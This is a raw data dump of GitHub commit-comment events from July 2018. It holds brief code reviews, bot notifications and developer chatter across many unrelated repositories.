{"id":"7903435300","type":"CommitCommentEvent","actor":{"login":"FedericoGuerri"},"repo":{"name":"FedericoGuerri/TraineeShip-Android"},"payload":{"comment":{"id":29558920,"position":null,"line":null,"path":null,"commit_id":"db2862e566de1f524600f4e590042dc3cd8d785b","created_at":"2018-07-01T18:09:45Z","updated_at":"2018-07-01T18:09:45Z","author_association":"OWNER","body":"Also, replacing thread.sleep with systemclock.sleep."}},"created_at":"2018-07-01T18:09:45Z"}
{"id":"7903438172","type":"CommitCommentEvent","actor":{"login":"it0uchpods"},"repo":{"name":"c172p-team/c172p"},"payload":{"comment":{"id":29558928,"position":null,"line":null,"path":null,"commit_id":"3ae6a0940f6a98a48b828f77d96de939f5ddaf84","created_at":"2018-07-01T18:11:41Z","updated_at":"2018-07-01T18:11:41Z","author_association":"CONTRIBUTOR","body":"Hi @gilbertohasnofb please don't take what I'm saying as an insult. I understood your post as saying you changed it only for looking nicer. If that is wrong, then I stand corrected.\r\n\r\nI did miss that somehow, you are right. The issue I have is less about the colors, but about the indicator itself, here is what I mean:\r\nIf you look closely, you can see an outline around it, looking somewhat like an oval with some corners. Your model doesn't have this, it looks like one continuous surface, which isn't right. The oval part moves up and down for pitch, and the entire indicator rotates for roll. \r\n\r\nFurther, there is not depth to the instrument, it just looks flat (as well as some of the others). \r\n\r\nJ"}},"created_at":"2018-07-01T18:11:41Z"}
{"id":"7903438362","type":"CommitCommentEvent","actor":{"login":"mnsrv"},"repo":{"name":"lsv/fifa-worldcup-2018"},"payload":{"comment":{"id":29558929,"position":null,"line":null,"path":null,"commit_id":"41147816e314b7f3a4eb235768c79b4ba45841ab","created_at":"2018-07-01T18:11:50Z","updated_at":"2018-07-01T18:11:50Z","author_association":"NONE","body":"Where is penalty and winner?"}},"created_at":"2018-07-01T18:11:50Z"}
{"id":"7903439198","type":"CommitCommentEvent","actor":{"login":"RMHogervorst"},"repo":{"name":"satRdays/amsterdam2018"},"payload":{"comment":{"id":29558930,"position":null,"line":null,"path":null,"commit_id":"0ec37037c626162f55136bdcb5715143701671f0","created_at":"2018-07-01T18:12:24Z","updated_at":"2018-07-01T18:12:24Z","author_association":"COLLABORATOR","body":":+1: "}},"created_at":"2018-07-01T18:12:24Z"}
{"id":"7903440048","type":"CommitCommentEvent","actor":{"login":"M66B"},"repo":{"name":"android-hacker/VirtualXposed"},"payload":{"comment":{"id":29558931,"position":null,"line":null,"path":null,"commit_id":"930961b88ba11ea882b47034a1b21fddbbe6ee77","created_at":"2018-07-01T18:12:57Z","updated_at":"2018-07-01T18:12:57Z","author_association":"NONE","body":"Since XPrivacyLua does support VirtualXposed now, it is better to revert this commit."}},"created_at":"2018-07-01T18:12:57Z"}
{"id":"7903440532","type":"CommitCommentEvent","actor":{"login":"wlbragg"},"repo":{"name":"c172p-team/c172p"},"payload":{"comment":{"id":29558933,"position":null,"line":null,"path":null,"commit_id":"3ae6a0940f6a98a48b828f77d96de939f5ddaf84","created_at":"2018-07-01T18:13:16Z","updated_at":"2018-07-01T18:13:16Z","author_association":"COLLABORATOR","body":"@it0uchpods lets get this to it's own issue, I actually see something in a detailed picture @gilbertohasnofb posted for another change that may address part of your issue with this instrument.\r\nBut I don't want to discuss it here."}},"created_at":"2018-07-01T18:13:16Z"}
{"id":"7903441271","type":"CommitCommentEvent","actor":{"login":"mstembera"},"repo":{"name":"noobpwnftw/Stockfish"},"payload":{"comment":{"id":29558934,"position":null,"line":null,"path":null,"commit_id":"5d5bc8eb02f4b372c0ed163afb3bc253b082568d","created_at":"2018-07-01T18:13:49Z","updated_at":"2018-07-01T18:13:49Z","author_association":"NONE","body":"@noobpwnftw \r\nThank you for making your machine available and running these.  Can you give a more detailed specification of the machine?  i.e., how many sockets and which CPUs?  IMO the most interesting test would be between 384 and 192 threads to show whether SF can usefully scale beyond 192."}},"created_at":"2018-07-01T18:13:49Z"}
{"id":"7903442687","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/arrow-cpp-feedstock"},"payload":{"comment":{"id":29558936,"position":null,"line":null,"path":null,"commit_id":"105d91f6a6d319c21d94390b5ca249b13b5b4a3b","created_at":"2018-07-01T18:14:55Z","updated_at":"2018-07-01T18:14:55Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @robertnishihara, @pcmoritz were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @robertnishihara, @pcmoritz were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-01T18:14:55Z"}
{"id":"7903443950","type":"CommitCommentEvent","actor":{"login":"saurabh31090"},"repo":{"name":"saurabh31090/GIT-Test-Repo"},"payload":{"comment":{"id":29558942,"position":null,"line":null,"path":null,"commit_id":"1d161d28ce501842334fa81ebea20e01f58efece","created_at":"2018-07-01T18:15:53Z","updated_at":"2018-07-01T18:15:53Z","author_association":"OWNER","body":"hello test"}},"created_at":"2018-07-01T18:15:53Z"}
{"id":"7903445434","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"MarcinDomanskiGitUser1/marcin-domanski-kodilla-java2"},"payload":{"comment":{"id":29558943,"position":21,"line":25,"path":"kodilla-stream/src/main/java/com/kodilla/stream/StreamMain.java","commit_id":"248778649ef42095db47c191cdecbd8cc1904870","created_at":"2018-07-01T18:16:57Z","updated_at":"2018-07-01T18:16:57Z","author_association":"NONE","body":"Nie powinno to być porównania z rokiem wpisanym na sztywno. Gdy zmieni się rok, filtrowanie nie zadziała poprawnie. Spróbuj użyć ChronoUnit"}},"created_at":"2018-07-01T18:16:57Z"}
{"id":"7903445607","type":"CommitCommentEvent","actor":{"login":"Mohamed-Shabeer-KP"},"repo":{"name":"surajsuresh29/Calender"},"payload":{"comment":{"id":29558944,"position":null,"line":null,"path":null,"commit_id":"9e418de7051268a3be25a6f090dd85acede3a4e2","created_at":"2018-07-01T18:17:06Z","updated_at":"2018-07-01T18:17:06Z","author_association":"NONE","body":"HI BOSS"}},"created_at":"2018-07-01T18:17:06Z"}
{"id":"7903451639","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29558951,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-01T18:21:25Z","updated_at":"2018-07-01T18:21:25Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-01T18:21:25Z"}
{"id":"7903452089","type":"CommitCommentEvent","actor":{"login":"allenjwelch"},"repo":{"name":"allenjwelch/cicerowned_project"},"payload":{"comment":{"id":29558952,"position":null,"line":null,"path":null,"commit_id":"1be1884f836e6d5f084f7c622766a68547259c89","created_at":"2018-07-01T18:21:44Z","updated_at":"2018-07-01T18:21:44Z","author_association":"OWNER","body":"Initial react page loads successfully! \r\nFYI - I was having issues using both yarn and npm to install dependencies and each were creating their own package lock files which threw off deployment. I've removed the yarn lock, updated the npm packages, and have since only been using npm for installing new packages as well as starting the app (\"npm start\") and have had no issues. Page is also successfully loaded on Heroku! All this is needed with Heroku would be to add in the mongolabs once we get a little further with the db. "}},"created_at":"2018-07-01T18:21:44Z"}
{"id":"7903453340","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29558953,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-01T18:22:33Z","updated_at":"2018-07-01T18:22:33Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-01T18:22:33Z"}
{"id":"7903453413","type":"CommitCommentEvent","actor":{"login":"noobpwnftw"},"repo":{"name":"noobpwnftw/Stockfish"},"payload":{"comment":{"id":29558954,"position":null,"line":null,"path":null,"commit_id":"5d5bc8eb02f4b372c0ed163afb3bc253b082568d","created_at":"2018-07-01T18:22:36Z","updated_at":"2018-07-01T18:22:36Z","author_association":"OWNER","body":"@mstembera 8 sockets, Xeon Scalable 8168. NPS seems to be almost linear scaling to threads, somewhere around 430M w/ 384 threads."}},"created_at":"2018-07-01T18:22:36Z"}
{"id":"7903453521","type":"CommitCommentEvent","actor":{"login":"marc2k3"},"repo":{"name":"TheQwertiest/foo-jscript-panel"},"payload":{"comment":{"id":29558955,"position":null,"line":null,"path":null,"commit_id":"569f784ac87bae531eed258eab32383b9dc59d8b","created_at":"2018-07-01T18:22:41Z","updated_at":"2018-07-01T18:22:41Z","author_association":"NONE","body":"Looks like you're steaming ahead with this quite nicely. I look forward to the release. :grin: "}},"created_at":"2018-07-01T18:22:41Z"}
{"id":"7903453698","type":"CommitCommentEvent","actor":{"login":"CTCaer"},"repo":{"name":"CTCaer/hekate"},"payload":{"comment":{"id":29558957,"position":null,"line":null,"path":null,"commit_id":"3e35d99a3b02512bd70b5e11c46f21297c5c95f7","created_at":"2018-07-01T18:22:50Z","updated_at":"2018-07-01T18:22:50Z","author_association":"OWNER","body":"Thank you! It took a lot of time, but it's now up!"}},"created_at":"2018-07-01T18:22:50Z"}
{"id":"7903453699","type":"CommitCommentEvent","actor":{"login":"ufrshubham"},"repo":{"name":"ufrshubham/SDBMS"},"payload":{"comment":{"id":29558956,"position":16,"line":16,"path":"SDBMS/ReadWrite.h","commit_id":"5d0b9abac0cd09848019349022086286d21c1972","created_at":"2018-07-01T18:22:50Z","updated_at":"2018-07-01T18:22:50Z","author_association":"OWNER","body":"If I'm not mistaken, read write object stores data of each student. So should we really keep no of students with student?"}},"created_at":"2018-07-01T18:22:50Z"}
{"id":"7903453821","type":"CommitCommentEvent","actor":{"login":"godo13405"},"repo":{"name":"godo13405/dragon-spellbook"},"payload":{"comment":{"id":29558958,"position":null,"line":null,"path":null,"commit_id":"c74c862fc764654d1d9377eec002693a476d0631","created_at":"2018-07-01T18:22:54Z","updated_at":"2018-07-01T18:22:54Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/48c4c854-767b-47f7-b2ec-7f79e14cf35d?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/7ddab936-a781-49fa-99fc-742d790aea96?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\") deployed [dragon-spellbook](https://github.com/godo13405/dragon-spellbook/releases/tag/deploy-ibm-yp-eu-gb-UXCalibur-prod-20180701-182253 \"deploy-ibm-yp-eu-gb-UXCalibur-prod-20180701-182253\") to [prod](https://console.bluemix.net/apps/aaffb021-5482-4ff5-bc14-26c90db6686c?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:UXCalibur:prod\"), including this commit"}},"created_at":"2018-07-01T18:22:54Z"}
{"id":"7903461554","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29558985,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-01T18:28:26Z","updated_at":"2018-07-01T18:28:26Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-01T18:28:26Z"}
{"id":"7903463188","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29558991,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-01T18:29:35Z","updated_at":"2018-07-01T18:29:35Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-01T18:29:35Z"}
{"id":"7903464476","type":"CommitCommentEvent","actor":{"login":"bakurits"},"repo":{"name":"3NF/LINC"},"payload":{"comment":{"id":29559001,"position":null,"line":null,"path":null,"commit_id":"9b2c04b96b559ef173de0fde3b5e2c4671995a14","created_at":"2018-07-01T18:30:29Z","updated_at":"2018-07-01T18:30:29Z","author_association":"CONTRIBUTOR","body":"@3NFBAGDU აგერ გიო ;დ"}},"created_at":"2018-07-01T18:30:29Z"}
{"id":"7903464836","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29559002,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-01T18:30:46Z","updated_at":"2018-07-01T18:30:46Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-01T18:30:46Z"}
{"id":"7903465307","type":"CommitCommentEvent","actor":{"login":"dooboolab"},"repo":{"name":"luizstacio/select-shell"},"payload":{"comment":{"id":29559004,"position":null,"line":null,"path":null,"commit_id":"7227bb8299311ccb0e025bb7b6b731a7f992c554","created_at":"2018-07-01T18:31:04Z","updated_at":"2018-07-01T18:31:04Z","author_association":"NONE","body":"Thank you."}},"created_at":"2018-07-01T18:31:04Z"}
{"id":"7903466025","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"stashinskii/NET.S.2018.Stashynski.03"},"payload":{"comment":{"id":29559007,"position":18,"line":22,"path":"NewtonMethod/NewtonMethod.cs","commit_id":"eab323631840c0dd8b395727bfa1bfd3bc2f2155","created_at":"2018-07-01T18:31:32Z","updated_at":"2018-07-01T18:31:32Z","author_association":"NONE","body":"- к сожалению, коду-клиенту не видны те исключения, которые может генерировать этот метод\r\n- параметр степени имеет не тот тип и не очень говорящее имя"}},"created_at":"2018-07-01T18:31:32Z"}
{"id":"7903466523","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29559011,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-01T18:31:56Z","updated_at":"2018-07-01T18:31:56Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-01T18:31:56Z"}
{"id":"7903466560","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29559012,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-01T18:31:58Z","updated_at":"2018-07-01T18:31:58Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-01T18:31:58Z"}
{"id":"7903466850","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"stashinskii/NET.S.2018.Stashynski.03"},"payload":{"comment":{"id":29559013,"position":38,"line":42,"path":"NewtonMethod/NewtonMethod.cs","commit_id":"eab323631840c0dd8b395727bfa1bfd3bc2f2155","created_at":"2018-07-01T18:32:12Z","updated_at":"2018-07-01T18:32:12Z","author_association":"NONE","body":"- не все условия "}},"created_at":"2018-07-01T18:32:12Z"}
{"id":"7903467277","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"stashinskii/NET.S.2018.Stashynski.03"},"payload":{"comment":{"id":29559014,"position":44,"line":48,"path":"NewtonMethod/NewtonMethod.cs","commit_id":"eab323631840c0dd8b395727bfa1bfd3bc2f2155","created_at":"2018-07-01T18:32:32Z","updated_at":"2018-07-01T18:32:32Z","author_association":"NONE","body":"if (accuracy <= 0 || accuracy >= 1)"}},"created_at":"2018-07-01T18:32:32Z"}
{"id":"7903467975","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29559015,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-01T18:33:06Z","updated_at":"2018-07-01T18:33:06Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-01T18:33:06Z"}
{"id":"7903469526","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29559018,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-01T18:34:16Z","updated_at":"2018-07-01T18:34:16Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-01T18:34:16Z"}
{"id":"7903469607","type":"CommitCommentEvent","actor":{"login":"mbrown711"},"repo":{"name":"mbrown711/MOOC-Exercise-38"},"payload":{"comment":{"id":29559019,"position":4,"line":8,"path":"Exercise38.java","commit_id":"271bec16fffcfae8a2f3f232fd0256eafe61d53c","created_at":"2018-07-01T18:34:20Z","updated_at":"2018-07-01T18:34:20Z","author_association":"OWNER","body":"no semicolon here!"}},"created_at":"2018-07-01T18:34:20Z"}
{"id":"7903470416","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"stashinskii/NET.S.2018.Stashynski.03"},"payload":{"comment":{"id":29559021,"position":70,"line":74,"path":"NewtonMethod/NewtonMethod.cs","commit_id":"eab323631840c0dd8b395727bfa1bfd3bc2f2155","created_at":"2018-07-01T18:34:54Z","updated_at":"2018-07-01T18:34:54Z","author_association":"NONE","body":"Следует вернуть то значение, которое дало выход из цикла, метод CustomTruncate - лишнее"}},"created_at":"2018-07-01T18:34:54Z"}
{"id":"7903471194","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29559023,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-01T18:35:28Z","updated_at":"2018-07-01T18:35:28Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-01T18:35:28Z"}
{"id":"7903472457","type":"CommitCommentEvent","actor":{"login":"mbrown711"},"repo":{"name":"mbrown711/MOOC-Exercise-38"},"payload":{"comment":{"id":29559025,"position":7,"line":7,"path":"Exercise38.java","commit_id":"8a2b72a5c875216d22151594ef91ac35f008b0d6","created_at":"2018-07-01T18:36:24Z","updated_at":"2018-07-01T18:36:24Z","author_association":"OWNER","body":"In between 7 and 8, needed to add `System.out.println(\"How many times would you like to see this printed?\");`"}},"created_at":"2018-07-01T18:36:24Z"}
{"id":"7903472725","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29559027,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-01T18:36:36Z","updated_at":"2018-07-01T18:36:36Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-01T18:36:36Z"}
{"id":"7903472814","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29559028,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-01T18:36:40Z","updated_at":"2018-07-01T18:36:40Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-01T18:36:40Z"}
{"id":"7903473528","type":"CommitCommentEvent","actor":{"login":"Yilnis"},"repo":{"name":"Yilnis/rtl8812au"},"payload":{"comment":{"id":29559030,"position":null,"line":null,"path":null,"commit_id":"4705fae0687656322ccc8272a3af3a80afa8d4d0","created_at":"2018-07-01T18:37:08Z","updated_at":"2018-07-01T18:37:08Z","author_association":"OWNER","body":"![schermopname](https://user-images.githubusercontent.com/40336235/42137552-805acebc-7d6e-11e8-8426-18a46afd414c.png)\r\n"}},"created_at":"2018-07-01T18:37:08Z"}
{"id":"7903474432","type":"CommitCommentEvent","actor":{"login":"mbrown711"},"repo":{"name":"mbrown711/MOOC-Exercise-38"},"payload":{"comment":{"id":29559031,"position":6,"line":9,"path":"Exercise38.java","commit_id":"4baf15092ff0c4a36f1c9944fab828430c376d27","created_at":"2018-07-01T18:37:47Z","updated_at":"2018-07-01T18:37:47Z","author_association":"OWNER","body":"the variable can be `n` for short to make it easier"}},"created_at":"2018-07-01T18:37:47Z"}
